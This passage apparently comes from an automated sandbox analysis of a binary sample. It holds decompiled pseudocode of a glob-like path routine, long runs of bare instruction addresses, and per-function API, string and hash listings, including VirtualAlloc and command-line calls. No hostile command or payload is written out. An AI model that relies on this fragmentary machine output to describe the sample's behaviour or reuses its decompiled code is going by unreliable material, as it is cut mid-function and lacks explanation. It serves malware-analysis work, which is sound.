																 *_t311 = 0;
																if(_v80 <= 0) {
																	 *_t346 = _t311;
																	if(_v76 != 0) {
																		goto L117;
																	}
																	goto L133;
																}
																_t346[1] = _t311;
																goto L117;
															}
															L42:
															_t346 = _t361;
															_t313 = _t346[2];
															 *_t431 = _t417;
															_v120 = _t313;
															if(_t403 != 0) {
																goto L40;
															}
															goto L44;
														}
														L45:
														_t361 = _t382;
														if(_t361 != 0) {
															goto L42;
														}
														goto L46;
														L40:
														_t313 = strcoll();
														_t382 =  *_t346;
														if(_t313 <= 0) {
															goto L45;
														}
														goto L41;
													}
												}
											}
											_t384 =  *(_t304 + 1) & 0x000000ff;
											_t416 = _t416 + 1;
											_t304 = _t304 + 2;
											 *(_t416 - 1) = _t384;
											if(_t384 != 0) {
												goto L34;
											}
											goto L36;
										} else {
											continue;
										}
									}
									 *_t425 = _t399;
									E00425290();
									if(_v76 != 0) {
										E004240D0(_v76, _a4);
									}
									L113:
									_t401 = _v72;
									_t341 = _t401 + 4;
									 *_t425 =  *(_t341 - 4);
									free(??);
									_t261 =  *(_t401 + 4);
									if(_t261 == 0) {
										L134:
										_v72 = _v36;
										goto L124;
									}
									if(_v56 == 1) {
										L121:
										_t267 = _v72[1];
										do {
											_t341 =  &(_t341[1]);
											 *_t425 = _t267;
											free(??);
											_t267 =  *_t341;
										} while (_t267 != 0);
										L123:
										_v56 = 1;
										_v72 = _v36;
										goto L124;
									}
									_v72 = _t341;
									continue;
									L118:
									if((_v52 & 0x00000004) == 0) {
										_t400 = _v64;
										if(_t400 == 0) {
											goto L113;
										}
										L0042B2A8();
										_v120 =  *_t263;
										_t414 = _v72;
										 *_t425 =  *_t414;
										if( *_t400() == 0) {
											goto L113;
										}
										_t272 = _t414;
										_t341 =  &(_t414[1]);
										_t402 = _t414;
										L120:
										 *_t425 =  *_t272;
										free(??);
										if(_t402[1] == 0) {
											goto L123;
										}
										goto L121;
									}
									_t402 = _v72;
									_t341 =  &(_t402[1]);
									_t272 = _t402;
									goto L120;
								}
							}
						}
						_t355 =  *_t255 & 0x000000ff;
						_v97 = _t355;
						if(_t355 == 0x2f || _t355 == 0x5c) {
							_v60 = _t255;
						} else {
							while(1) {
								_t22 = _t255 - 1; // -2
								_t386 = _t22;
								if(_t336 == _t386) {
									break;
								}
								_t355 =  *(_t255 - 1) & 0x000000ff;
								_t255 = _t386;
								if(_t355 == 0x2f || _t355 == 0x5c) {
									_v60 = _t386;
									_v97 = _t355;
									goto L16;
								} else {
									continue;
								}
							}
							_v60 = _t386;
							_v97 =  *(_t255 - 1) & 0x000000ff;
						}
						goto L16;
					}
					_t439 = _t252 - 0x5c;
					if(_t439 == 0) {
						goto L8;
					}
					_t355 = 2;
					asm("repe cmpsb");
					if(_t439 == 0) {
						if((_v52 & 0x00000010) != 0) {
							_t324 = L00423A80(_t336, _v52);
							_v56 = _t324;
							if(_t324 != 0) {
								goto L110;
							}
							 *_t425 = _t336;
							_t419 = _t425;
							_t432 = _t425 - E0041C220(strlen(??) + 0x10 >> 4 << 4);
							_t363 =  &_v112;
							_t388 = _t363;
							do {
								_t330 =  *_t336 & 0x000000ff;
								if(_t330 == 0x7f) {
									_t330 =  *(_t336 + 1) & 0x000000ff;
									_t336 = _t336 + 1;
								}
								_t388 = _t388 + 1;
								_t336 = _t336 + 1;
								 *(_t388 - 1) = _t330;
							} while (_t330 != 0);
							 *_t432 = _t363;
							L0042B408();
							_t425 = _t419;
							if(_t330 == 0 || _a4 == 0) {
								goto L134;
							} else {
								E00424070(_t330, _a4);
								_v72 = _v36;
								goto L124;
							}
						}
						L110:
						_v60 = _t336;
						_v97 = 0x5c;
						_v96 = 0;
						goto L22;
					}
					goto L8;
				}
			}

0x00424126
0x00424128
0x0042412b
0x00424131
0x00424134
0x00424490
0x00424493
0x004244a9
0x004244ab
0x004244ad
0x004244b1
0x004244b3
0x004244b6
0x00000000
0x004244b9
0x004244bb
0x004244e5
0x004244e5
0x004244e9
0x004244ee
0x004245a0
0x004245a3
0x004245a6
0x004245a9
0x00000000
0x004245a9
0x004244f4
0x004244f7
0x004244c1
0x004244c3
0x004244c6
0x004244c6
0x004244c9
0x004244cb
0x0042498f
0x00424999
0x0042499c
0x00424505
0x00424505
0x00424505
0x00424508
0x0042450d
0x0042450d
0x00424513
0x00000000
0x00000000
0x00424515
0x00424515
0x00424518
0x0042451a
0x00424525
0x00424528
0x004245b3
0x0042467a
0x00000000
0x0042467a
0x00000000
0x004245b3
0x0042452e
0x00424530
0x00424534
0x00424539
0x00000000
0x00000000
0x00424560
0x00424562
0x00424590
0x00424593
0x00424598
0x00424564
0x00424566
0x0042456a
0x0042456a
0x00424570
0x00424573
0x00424575
0x00424978
0x00424550
0x00424550
0x0042466a
0x00424483
0x0042448d
0x0042448d
0x00424980
0x00424982
0x00424660
0x00424660
0x00424663
0x00000000
0x00424663
0x004245b9
0x004245b9
0x004245bb
0x004245bb
0x004245c0
0x004245c0
0x004245c0
0x004245c0
0x004245c0
0x004245c4
0x004245c4
0x004245ca
0x00000000
0x00000000
0x004245d0
0x004245d4
0x004245e8
0x004245e8
0x004245ec
0x004245ec
0x004245f2
0x00000000
0x00000000
0x004245e4
0x00000000
0x00000000
0x004245e6
0x004245e6
0x004245f4
0x004245f7
0x00424672
0x004245c0
0x004245c0
0x004245c4
0x004245c4
0x004245ca
0x00000000
0x00000000
0x00000000
0x004245ca
0x004245fc
0x00000000
0x00000000
0x00000000
0x004245fc
0x00000000
0x004246ef
0x004246ef
0x00000000
0x004246ef
0x00424653
0x00000000
0x004245fe
0x004245fe
0x004245fe
0x00424603
0x00424603
0x00424603
0x00424606
0x00424613
0x00424613
0x00424616
0x0042461b
0x0042461e
0x00000000
0x00000000
0x00424610
0x00424610
0x00424623
0x00424626
0x00424634
0x0042463c
0x0042463f
0x00000000
0x00000000
0x00000000
0x0042457b
0x0042457b
0x0042450d
0x00424513
0x00000000
0x00000000
0x00000000
0x00424513
0x00424575
0x0042453b
0x0042453b
0x0042453f
0x00424542
0x00424547
0x0042454a
0x00424580
0x00424584
0x00424586
0x00000000
0x00424586
0x0042454c
0x00000000
0x0042454c
0x00424645
0x0042464e
0x00000000
0x0042464e
0x00424991
0x00000000
0x004244d9
0x004244d9
0x004244dd
0x004244df
0x004244e3
0x00000000
0x00000000
0x00000000
0x004244e3
0x004244cb
0x004244bd
0x004244bf
0x00424500
0x00424503
0x00000000
0x00424503
0x00000000
0x004244bf
0x004244b9
0x0042413a
0x0042413a
0x0042413d
0x00424145
0x00424156
0x0042415c
0x00424160
0x00424164
0x0042416c
0x0042416f
0x00424174
0x00424177
0x0042417c
0x00424183
0x0042418a
0x0042418d
0x00424480
0x00000000
0x00424480
0x00424193
0x004241a1
0x00424681
0x00424683
0x00424694
0x00424699
0x0042469c
0x0042469e
0x004246a2
0x004246bd
0x004246bd
0x004246c2
0x004246c4
0x004246c8
0x004246c8
0x004246b0
0x004246b3
0x004246b8
0x004246b8
0x004246cd
0x004246d0
0x004246d7
0x004246d9
0x00424476
0x00000000
0x00424476
0x004246e7
0x00000000
0x004241a7
0x004241af
0x004241bc
0x004241bf
0x004241bf
0x004241c4
0x00000000
0x00000000
0x004241ca
0x004241d0
0x004241eb
0x004241ee
0x004241f6
0x004241fa
0x00424966
0x00424969
0x0042496c
0x00424249
0x00424249
0x0042424f
0x00424259
0x0042425c
0x00424264
0x00424264
0x00424267
0x00424271
0x00424274
0x00424276
0x00000000
0x00000000
0x00424262
0x00424262
0x0042427a
0x0042427d
0x00424283
0x00000000
0x004248cb
0x004248ce
0x004248d2
0x00424286
0x00424286
0x0042428c
0x00424293
0x00424296
0x0042429e
0x004242a3
0x004247ba
0x004247bd
0x004247c0
0x00000000
0x00000000
0x00000000
0x00000000
0x004242a9
0x004242a9
0x004242a9
0x004242ac
0x004242b3
0x004242b5
0x00000000
0x00000000
0x004242c0
0x0042483a
0x004242c6
0x004242cb
0x004242d3
0x004242d3
0x004242d9
0x004242e3
0x004242f0
0x004242f0
0x004242f0
0x004242f3
0x004242fa
0x004242fc
0x00000000
0x00000000
0x00424307
0x0042430f
0x0042430f
0x00424321
0x00000000
0x00000000
0x00424323
0x0042432a
0x0042433c
0x00424341
0x00424348
0x0042434e
0x004247d3
0x004247db
0x004247de
0x004247e2
0x004247e6
0x004247eb
0x004247ee
0x004247f1
0x004247f8
0x00424823
0x004247fe
0x00424803
0x0042480c
0x0042480c
0x004247f8
0x0042435a
0x0042435e
0x00424362
0x00424366
0x00424369
0x0042436e
0x00424384
0x00424386
0x00424388
0x0042438c
0x0042439d
0x0042439d
0x0042439d
0x004243a3
0x00000000
0x00000000
0x00424390
0x00424393
0x00424398
0x0042439b
0x004243b9
0x004243b9
0x004243bc
0x004243c3
0x004243c5
0x004243c7
0x00424814
0x0042476b
0x0042476b
0x00000000
0x0042476b
0x004243de
0x004243e1
0x004243e6
0x00424765
0x00424830
0x00424830
0x00000000
0x00424765
0x004243ec
0x004243f1
0x004248a5
0x004248ac
0x004248b3
0x00000000
0x00000000
0x004248b9
0x004248bc
0x004248c3
0x00424853
0x00424853
0x00000000
0x00424853
0x004243fc
0x004243ff
0x00424417
0x00424417
0x0042441c
0x0042441f
0x00424423
0x00000000
0x00000000
0x00424425
0x00424425
0x0042442c
0x0042442e
0x00424431
0x00424411
0x00424413
0x00424439
0x00424439
0x0042443c
0x0042443f
0x00424446
0x0042444d
0x00000000
0x00000000
0x00424456
0x00424459
0x00424460
0x00424468
0x00424846
0x0042484d
0x00000000
0x00000000
0x00000000
0x0042484d
0x0042446e
0x00000000
0x0042446e
0x00424415
0x00424415
0x00424417
0x0042441c
0x0042441f
0x00424423
0x00000000
0x00000000
0x00000000
0x00424423
0x00424433
0x00424433
0x00424437
0x00000000
0x00000000
0x00000000
0x00424403
0x00424403
0x0042440a
0x0042440f
0x00000000
0x00000000
0x00000000
0x0042440f
0x00424417
0x0042439b
0x004243a5
0x004243ac
0x004243af
0x004243b4
0x004243b7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00424307
0x00424713
0x00424716
0x00424720
0x00424728
0x00424728
0x0042472d
0x0042472d
0x00424730
0x00424736
0x00424739
0x0042473e
0x00424743
0x0042485b
0x0042485e
0x00000000
0x0042485e
0x0042474d
0x00424796
0x00424799
0x0042479c
0x0042479c
0x0042479f
0x004247a2
0x004247a7
0x004247a9
0x004247ad
0x004247b0
0x004247b7
0x00000000
0x004247b7
0x0042474f
0x00000000
0x00424773
0x00424777
0x00424866
0x0042486b
0x00000000
0x00000000
0x00424871
0x00424878
0x0042487c
0x00424881
0x00424888
0x00000000
0x00000000
0x0042488e
0x00424890
0x00424893
0x00424785
0x00424787
0x0042478a
0x00424794
0x00000000
0x00000000
0x00000000
0x00424794
0x0042477d
0x00424780
0x00424783
0x00000000
0x00424783
0x004242a9
0x0042424f
0x00424200
0x00424206
0x00424209
0x0042495e
0x00424238
0x00424238
0x00424238
0x00424238
0x0042423d
0x00000000
0x00000000
0x00424220
0x00424224
0x00424229
0x0042489a
0x0042489d
0x00000000
0x00000000
0x00000000
0x00000000
0x00424229
0x00424243
0x00424246
0x00424246
0x00000000
0x00424209
0x004241d2
0x004241d4
0x00000000
0x00000000
0x004241de
0x004241e3
0x004241e5
0x004246fa
0x004248df
0x004248e6
0x004248e9
0x00000000
0x00000000
0x004248ef
0x004248f2
0x00424907
0x00424909
0x0042490d
0x0042491e
0x0042491e
0x00424923
0x00424925
0x00424929
0x00424929
0x00424911
0x00424914
0x00424919
0x00424919
0x0042492e
0x00424931
0x00424938
0x0042493a
0x00000000
0x0042494b
0x0042494e
0x00424956
0x00000000
0x00424956
0x0042493a
0x00424700
0x00424700
0x00424703
0x00424707
0x00000000
0x00424707
0x00000000
0x004241e5

APIs

strlen.MSVCRT ref: 00424140
memcpy.MSVCRT ref: 00424167

Part of subcall function 00424B00: setlocale.MSVCRT ref: 00424B18
Part of subcall function 00424B00: _strdup.MSVCRT ref: 00424B26
Part of subcall function 00424B00: setlocale.MSVCRT ref: 00424B3C
Part of subcall function 00424B00: wcstombs.MSVCRT ref: 00424B67
Part of subcall function 00424B00: realloc.MSVCRT ref: 00424B7B
Part of subcall function 00424B00: wcstombs.MSVCRT ref: 00424B94
Part of subcall function 00424B00: setlocale.MSVCRT ref: 00424BA4
Part of subcall function 00424B00: free.MSVCRT ref: 00424BAC

Part of subcall function 00423B20: malloc.MSVCRT ref: 00423B3B

strlen.MSVCRT ref: 00424496
strlen.MSVCRT ref: 00424686
_strdup.MSVCRT ref: 004246D0

Part of subcall function 00424120: strlen.MSVCRT ref: 004241F1

Strings

\, xrefs: 004248CE

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: strlen$setlocale$_strdupwcstombs$freemallocmemcpyrealloc
String ID: \
API String ID: 3818432545-2967466578
Opcode ID: 7ec423548edddd31fb1172171624ded5f4303dbfa6a0717a804b939ea2766881
Instruction ID: 6bab2ba1e4bbff584d2888d673531f6975ca6569ec9e712c2f51e181aeaa1acf
Opcode Fuzzy Hash: 7ec423548edddd31fb1172171624ded5f4303dbfa6a0717a804b939ea2766881
Instruction Fuzzy Hash: FD429174F042648FDB10DFA9E4803AEBBF1EF85344F98455BD8959B301E3389942CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00424B00 Relevance: 27.3, APIs: 18, Instructions: 272
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

setlocale.MSVCRT ref: 00424B18
_strdup.MSVCRT ref: 00424B26
setlocale.MSVCRT ref: 00424B3C
wcstombs.MSVCRT ref: 00424B67
realloc.MSVCRT ref: 00424B7B
wcstombs.MSVCRT ref: 00424B94
setlocale.MSVCRT ref: 00424BA4
free.MSVCRT ref: 00424BAC
mbstowcs.MSVCRT ref: 00424BDA
mbstowcs.MSVCRT ref: 00424C04
wcstombs.MSVCRT ref: 00424CF3
realloc.MSVCRT ref: 00424D0A
wcstombs.MSVCRT ref: 00424D24
wcstombs.MSVCRT ref: 00424DDF
setlocale.MSVCRT ref: 00424DFB
free.MSVCRT ref: 00424E03
setlocale.MSVCRT ref: 00424E6B
free.MSVCRT ref: 00424E73

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: setlocalewcstombs$free$mbstowcsrealloc$_strdup
String ID:
API String ID: 2891164732-0
Opcode ID: b31dd5d4948880a8f93658e025a59d8b1e8f64e54700df8329e5d4990db15265
Instruction ID: 294d6ec6c8c2c08e6f5ecf196f345d9c47e40495e6456396b4dea8a54525ba36
Opcode Fuzzy Hash: b31dd5d4948880a8f93658e025a59d8b1e8f64e54700df8329e5d4990db15265
Instruction Fuzzy Hash: 81B19170A142358ACB20AF69E44527BF7F1FF94340FC5842FE4889B355E3789891DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041B6A0 Relevance: 19.5, APIs: 3, Strings: 8, Instructions: 257
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineA.KERNEL32 ref: 0041B6B6
strlen.MSVCRT ref: 0041B6C3

Strings

', xrefs: 0041B91D
@, xrefs: 0041B880
?, xrefs: 0041B71D
', xrefs: 0041B72C
*, xrefs: 0041B735
", xrefs: 0041B73E
\, xrefs: 0041B7E0
[, xrefs: 0041B7F2

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: CommandLinestrlen
String ID: "$'$'$*$?$@$[$\
API String ID: 3702654222-871974141
Opcode ID: 014621bda27978ea51d8879c53f59ee4fc01c41584cf4dee7b32efed8c197395
Instruction ID: b7f57443ae9d02fc7280bc91385ba25e2d13df21e05181c6e04709ad9e95b9c9
Opcode Fuzzy Hash: 014621bda27978ea51d8879c53f59ee4fc01c41584cf4dee7b32efed8c197395
Instruction Fuzzy Hash: 65A1C270A143098FDB14CB68D8843EEB7E6FB88304F18856BD855D7351E33998868BDA

Uniqueness

Uniqueness Score: -1.00%

Function 00406D2A Relevance: 11.6, APIs: 4, Strings: 1, Instructions: 4076memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004014F9: VirtualAlloc.KERNEL32 ref: 0040153B

VirtualAlloc.KERNEL32 ref: 00406D6C
VirtualAlloc.KERNEL32 ref: 00407F9B
VirtualAlloc.KERNEL32 ref: 0040925F
VirtualAlloc.KERNEL32 ref: 0040A21A

Strings

o, xrefs: 0040A20B

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: o
API String ID: 4275171209-252678980
Opcode ID: 7876b43eb201ecd0c654acdc51d58cb169a997b285aa601c4952b6215d074a63
Instruction ID: b6b0caca9b328ea0c1f73490f8004b060f5fa5f76fab2d150c52cdd5329ce992
Opcode Fuzzy Hash: 7876b43eb201ecd0c654acdc51d58cb169a997b285aa601c4952b6215d074a63
Instruction Fuzzy Hash: 88D32B76801229CFCB65CF58CDC5BD9B7B5BF44308F0881EAC949AB216E730AA95CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004014F9 Relevance: 10.2, APIs: 3, Strings: 1, Instructions: 4219memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 0040153B
VirtualAlloc.KERNEL32 ref: 00402634
VirtualAlloc.KERNEL32 ref: 004059A5

Strings

y, xrefs: 0040152C

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: y
API String ID: 4275171209-4225443349
Opcode ID: 925cafceef868559a619fe5fcb7d67b57cb65f6eee8d0d3c6efdfafa2b735f12
Instruction ID: 02314fd4cf1174d6d415910666e6840481e8a11ab169fa6f77ca844e3b2d8e92
Opcode Fuzzy Hash: 925cafceef868559a619fe5fcb7d67b57cb65f6eee8d0d3c6efdfafa2b735f12
Instruction Fuzzy Hash: D7D33C76C01229CBCB25CF58CD85BC9B7B5BF54308F1842EAC95DAB206D730AA95CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040C2A4 Relevance: 7.5, APIs: 3, Instructions: 3712
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406D2A: VirtualAlloc.KERNEL32 ref: 00406D6C

VirtualAlloc.KERNEL32 ref: 0040C2E6
VirtualAlloc.KERNEL32 ref: 0040D13F
VirtualAlloc.KERNEL32 ref: 0040EF6B

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6028685e0a6cedc7f31912a2d6d53837c396e9ebb7f4ffdaefeba7b3568ecc4f
Instruction ID: d97ebcd7520be7e76b50b5a5784d8158421a972f6e4ab85348ec855e199b89c8
Opcode Fuzzy Hash: 6028685e0a6cedc7f31912a2d6d53837c396e9ebb7f4ffdaefeba7b3568ecc4f
Instruction Fuzzy Hash: 8EC31B76C01229CFCB65CF58CD85BD9B7B5BF44308F0881EAC959AB216E730AA94CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004249B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

glob-1.0-mingw32, xrefs: 004249CE, 004249DD

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID:
String ID: glob-1.0-mingw32
API String ID: 0-3253302226
Opcode ID: 1abaf3b29fdba8cc23075ab6474858afc39f7b8f745aa37f70867453243fe092
Instruction ID: b8782072dfe865eb7d940e2225d954ac1887608d9f45a8cb93ab16330c58d1d1
Opcode Fuzzy Hash: 1abaf3b29fdba8cc23075ab6474858afc39f7b8f745aa37f70867453243fe092
Instruction Fuzzy Hash: D32190B2B443248BCB149F69F8452AFBBA5EFD4304F84455FE88167302D77CA941CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004AB5F0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 004AB604
malloc.MSVCRT ref: 004AB665

Strings

/J, xrefs: 004AB62B

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: malloc
String ID: /J
API String ID: 2803490479-1125715729
Opcode ID: 67903aeabbdab4e43518a7ea792d1a46330fa4c823134d3bf2966fdc01e39692
Instruction ID: 978cf8fcab6963bf5dc729908277cd5a72a91ab1d83133055cbf38acce71b218
Opcode Fuzzy Hash: 67903aeabbdab4e43518a7ea792d1a46330fa4c823134d3bf2966fdc01e39692
Instruction Fuzzy Hash: 4C0144B02053055AD7107F66A8C166B7694EF76348F41482FEE844B343E7BDD85097EB

Uniqueness

Uniqueness Score: -1.00%

Function 00424FD0 Relevance: 4.6, APIs: 3, Instructions: 53
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindNextFileA.KERNEL32 ref: 00424FE5
GetLastError.KERNEL32 ref: 00425052
_errno.MSVCRT ref: 0042505C

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

